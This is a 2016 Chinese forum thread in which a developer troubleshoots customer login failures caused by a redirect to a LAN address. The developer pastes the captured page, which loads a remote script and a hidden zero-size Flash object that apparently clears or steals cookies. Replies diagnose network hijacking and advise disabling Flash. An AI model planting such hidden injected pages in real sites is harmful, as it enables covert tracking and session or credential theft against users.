在客户电脑上发现异常网络请求172.18.200.135:89/cookie/flashcookie.html

显示全部楼层 · 发表于 2016-8-17 10:55:29

最近有客户反馈登录我们系统时会出现一直登录不上的情况，远程连接客户电脑后定位发现，客户电脑存在一登录就session丢失的情况，而且只有360安全浏览器极速模式有这个问题，在ie11下没问题。进过进一步抓包发现在每次session丢失前都会有这样一个异常请求出现：172.18.200.135:89/cookie/flashcookie.html?fc=1700981478&f=241674432&bt=1&interval=72&0.2369831004180014，请求响应内容为：Referer显示是从我们系统地址发起的请求。
[mw_shl_code=html,true]<html>
<head>
<script language="javascript">setTimeout("location.replace(location.href.split(\"#\")[0])",2000);</script>
<script type="text/javascript" src="http://172.18.200.135:89/cookie/flash.js"></script>
<script language="javascript">setTimeVal("1470387395704", "2278036140");setURL("172.18.200.135");supFlash("1782026436");</script>
</head>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="0" height="0" id="m" align="center"><param name="allowScriptAccess" value="always" />
<param name="movie" value="http://172.18.200.135:89/cookie/flashcookie.swf" />
<param name="quality" value="high" />
<param name="FlashVars" value="fc=1782026436&f=241674432" />
<embed src="http://172.18.200.135:89/cookie/flashcookie.swf"FlashVars="fc=1782026436&f=241674432" quality="high" width="0" height="0" name="m" align="center" allowScriptAccess="always" type="application/x-shockwave-flash"pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
</body></html>[/mw_shl_code]
我们系统是没有这种请求的，试过多个浏览器QQ、360安全浏览器极速模式有问题，兼容模式没问题，ie11没问题。我问下这是客户的电脑都中毒了吗？还是怎么回事？

显示全部楼层 · 发表于 2016-8-17 11:18:42

本帖最后由峪飞鹰于 2016-8-17 11:20 编辑

172.18.200.135 是局域网IP地址。

10.0.0.0 – 10.255.255.255
172.16.0.0 – 172.31.255.255
192.168.0.0 – 192.168.255.255

复制代码

正好在172.16.0.0-172.31.255.255之间，所以你客户的网络环境被软件或者硬件劫持，会有导向172.18.200.135这个ip的请求，至于请求如何插入的，需要进一步排查。

从那个flash页面的代码来看，flash是个0宽度0高度的东西，建议你的客户停用计算机上的所有flash功能，通过flash的隐藏属性以及url中包含的cookie字样来判断，有可能是偷网站登录凭证用的。

显示全部楼层 · 发表于 2016-8-17 12:27:25

峪飞鹰发表于 2016-8-17 11:18
172.18.200.135 是局域网IP地址。

对确认是局域网ip，有可能跟客户的DNS有关，他们的网络环境全是手动IP，DNS专门设置了一台他们局域网的机器，不知道是不是他们IT搞的鬼。目前可以确定的是从我们的请求跳转到这个地址后客户的cookie会被清除，所以导致登录异常。不知道有没有什么办法防止被这样劫持，或者即便到了这个地址也能够保护我们域的cookie不背清除？

显示全部楼层 · 发表于 2016-8-17 14:11:06

ELOHIM 发表于 2016-8-17 14:08
是不是因为flashplayer 版本过低，有漏洞利用什么的。
升级到最新flashplayer 可以吗？

最好停用flash吧，这种0高宽的flash绝对是不干好事的。js脚本的内容可能没多大帮助，关键是flash干了什么。

显示全部楼层 · 发表于 2016-8-17 14:12:42

ELOHIM 发表于 2016-8-17 14:08
是不是因为flashplayer 版本过低，有漏洞利用什么的。
升级到最新flashplayer 可以吗？

额，就是忘了把脚本扣下来，下次去客户现场把他们的js和flsh下下来看看

显示全部楼层 · 发表于 2016-8-17 14:13:06

峪飞鹰发表于 2016-8-17 14:11
最好停用flash吧，这种0高宽的flash绝对是不干好事的。js脚本的内容可能没多大帮助，关键是flash干了什么 ...

嗯。
那么楼主可以停用flashplayer 加载项了。
如果你们的系统用不到这个东西的话。
IE 加载项。火狐插件。
统统禁用……
不过，还是建议你们升级flashplayer 到最新版本比较好。
然后禁用。
如果不是8,8.1,10系统，可以卸载他了………………

[网络] 在客户电脑上发现异常网络请求172.18.200.135:89/cookie/flashcookie.html